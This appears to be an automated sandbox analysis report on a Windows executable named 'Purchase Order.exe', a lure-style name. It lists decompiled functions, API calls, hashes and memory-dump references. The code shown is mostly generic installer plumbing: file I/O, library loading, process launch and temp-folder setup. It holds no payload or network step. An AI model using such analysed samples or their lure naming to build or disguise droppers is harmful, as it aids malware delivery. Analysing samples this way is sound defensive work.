API String ID: 3712363035-0
Opcode ID: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
Instruction ID: 0547baa0b497a95b6ed0e8f273b1969b1ac2c9598ef2001c301bcde660c6e2d6
Opcode Fuzzy Hash: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
Instruction Fuzzy Hash: 3EE092B4600209BFEB10AB64AE49F7B7AACEB04704F004565BA51E61A1DB78E8158A78

Uniqueness

Uniqueness Score: -1.00%

Function 0040690A Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040690A(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E0040689A(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406912
0x00406915
0x0040691c
0x00406924
0x00406930
0x00000000
0x00406937
0x00406927
0x0040692e
0x00000000
0x0040693f
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
GetProcAddress.KERNEL32(00000000,?), ref: 00406937

Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E

Uniqueness

Uniqueness Score: -1.00%

Function 0040602D Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040602D(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00406031
0x0040603e
0x00406053
0x00406059

APIs

GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\Purchase Order.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15

Uniqueness

Uniqueness Score: -1.00%

Function 00406008 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406008(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}

0x0040600d
0x00406013
0x00406018
0x00406021
0x00406021
0x0040602a

APIs

GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406021

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98

Uniqueness

Uniqueness Score: -1.00%

Function 00403B12 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403B12() {
				void* _t1;
				void* _t3;
				signed int _t6;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
					_t6 =  *0x40a018;
				}
				E00403B57();
				_t3 = E00405C49(_t6, L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\nsbED8A.tmp\\", 7); // executed
				return _t3;
			}

0x00403b12
0x00403b1a
0x00403b1d
0x00403b23
0x00403b23
0x00403b23
0x00403b2a
0x00403b36
0x00403b3b

APIs

CloseHandle.KERNEL32(FFFFFFFF,00403A5E,?), ref: 00403B1D

Strings

C:\Users\user~1\AppData\Local\Temp\nsbED8A.tmp\, xrefs: 00403B31

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user~1\AppData\Local\Temp\nsbED8A.tmp\
API String ID: 2962429428-2563615098
Opcode ID: e86ec88962d2cddd060eb64ec5e150871475ae72b9f2b14f7d4b77a190cc5563
Instruction ID: 74b342ff74dc5917d60848dc34610585f5de2c5243f802b65b47dd8438b48b4d
Opcode Fuzzy Hash: e86ec88962d2cddd060eb64ec5e150871475ae72b9f2b14f7d4b77a190cc5563
Instruction Fuzzy Hash: 5EC0123050470056D1646F749E4FE153B64AB4073EB600325B0F9B10F1CB3C5759895D

Uniqueness

Uniqueness Score: -1.00%

Function 00405AEB Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405AEB(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405af1
0x00405af9
0x00000000
0x00405aff
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403810), ref: 00405AF1
GetLastError.KERNEL32 ref: 00405AFF

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D

Uniqueness

Uniqueness Score: -1.00%

Function 004060DF Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060DF(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004060e3
0x004060f3
0x004060fb
0x00000000
0x00406102
0x00000000
0x00406104

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4

Uniqueness

Uniqueness Score: -1.00%

Function 004060B0 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060B0(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004060b4
0x004060c4
0x004060cc
0x00000000
0x004060d3
0x00000000
0x004060d5

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4

Uniqueness

Uniqueness Score: -1.00%

Function 004034E5 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004034E5(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x004034f3
0x004034f9

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00401FA4() {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402DA6(_t15);
				E0040559F(0xffffffeb, _t7);
				_t9 = E00405B20(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E004069B5(_t17, _t20); // executed
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E00406484( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}

0x00401faa
0x00401faf
0x00401fb5
0x00401fba
0x00401fbe
0x0040292e
0x00401fc4
0x00401fc7
0x00401fca
0x00401fd2
0x00401fe1
0x00401fe3
0x00401fe3
0x00401fd4
0x00401fd8
0x00401fd8
0x00401fd2
0x00401fea
0x00401feb
0x00401feb
0x00402c2d
0x00402c39

APIs

Part of subcall function 0040559F: lstrlenW.KERNEL32(0042C248,00000000,00423303,772EEA30,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,0042C248,00000000,00423303,772EEA30,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
Part of subcall function 0040559F: lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
Part of subcall function 0040559F: SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

Part of subcall function 00405B20: CreateProcessW.KERNELBASE ref: 00405B49
Part of subcall function 00405B20: CloseHandle.KERNEL32(?), ref: 00405B56

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB

Part of subcall function 004069B5: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069C6
Part of subcall function 004069B5: GetExitCodeProcess.KERNELBASE ref: 004069E8

Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 0ed0e2ab39f5c8e86af128fc48084d23a51fbd29bcfb00740e0aac01a6416e6c
Instruction ID: a015d294fcb9cc4e365613bb9e09bf6e78b00889af70ee47f703a6c6056ea9c8
Opcode Fuzzy Hash: 0ed0e2ab39f5c8e86af128fc48084d23a51fbd29bcfb00740e0aac01a6416e6c
Instruction Fuzzy Hash: 2DF09072904112EBCB21BBA59A84EDE76E8DF01318F25403BE102B21D1D77C4E429A6E

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004056DE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x433ee4;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x42d268;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x433ecc == _t156) {
							ShowWindow( *0x434f08, 8);
							if( *0x434f8c == _t156) {
								E0040559F( *((intOrPtr*)( *0x42c240 + 0x34)), _t156);
							}
							E00404472(_t171);
							goto L25;
						}
						 *0x42ba38 = 2;
						E00404472(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00404500(_a8, _a12, _a16);
						}
						ShowWindow( *0x433ed0, _t156);
						ShowWindow(_t169, 8);
						E004044CE(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x434f10;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x433ed0 = GetDlgItem(_a4, 0x403);
				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x433ee4 = _t134;
				_v8 = _t134;
				E004044CE( *0x433ed0);
				 *0x433ed4 = E00404E27(4);
				 *0x433eec = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404499(_a4);
				if(( *0x434f18 & 0x00000003) != 0) {
					ShowWindow( *0x433ed0, _t156);
					if(( *0x434f18 & 0x00000002) != 0) {
						 *0x433ed0 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004044CE( *0x433ec8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x434f18 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x004056e6
0x004056ec
0x004056f6
0x004056f9
0x0040588f
0x004058b3
0x004058b3
0x004058c6
0x004058e4
0x004058e6
0x004058ee
0x00405944
0x00405948
0x00000000
0x00000000
0x0040594a
0x00405950
0x00000000
0x00000000
0x0040595a
0x00405962
0x00405965
0x00405a67
0x00000000
0x00405a67
0x00405974
0x0040597f
0x00405988
0x00405993
0x00405996
0x0040599f
0x004059a5
0x004059a8
0x004059a8
0x004059c0
0x004059c9
0x004059cc
0x004059d3
0x004059da
0x004059e2
0x004059e2
0x004059f9
0x004059f9
0x00405a00
0x00405a06
0x00405a12
0x00405a19
0x00405a22
0x00405a24
0x00405a27
0x00405a36
0x00405a39
0x00405a3f
0x00405a40
0x00405a46
0x00405a47
0x00405a48
0x00405a50
0x00405a5b
0x00405a61
0x00405a61
0x00000000
0x004059c0
0x004058f6
0x00405926
0x0040592e
0x00405939
0x00405939
0x0040593f
0x00000000
0x0040593f
0x004058fa
0x00405904
0x00000000
0x004058c8
0x004058ce
0x00405909
0x00000000
0x00405912
0x004058d7
0x004058dc
0x004058df
0x00000000
0x004058df
0x004058c6
0x004056ff
0x00405703
0x0040570b
0x0040570f
0x00405712
0x00405715
0x00405718
0x0040571b
0x0040571c
0x0040571d
0x00405736
0x00405739
0x00405743
0x00405752
0x0040575a
0x00405762
0x00405767
0x0040576a
0x00405776
0x0040577f
0x00405788
0x004057aa
0x004057b0
0x004057c1
0x004057c6
0x004057d4
0x004057e2
0x004057e2
0x004057e7
0x004057f5
0x004057f5
0x004057fa
0x004057fd
0x00405802
0x0040580e
0x00405817
0x00405824
0x00405833
0x00405826
0x0040582b
0x0040582b
0x0040583f
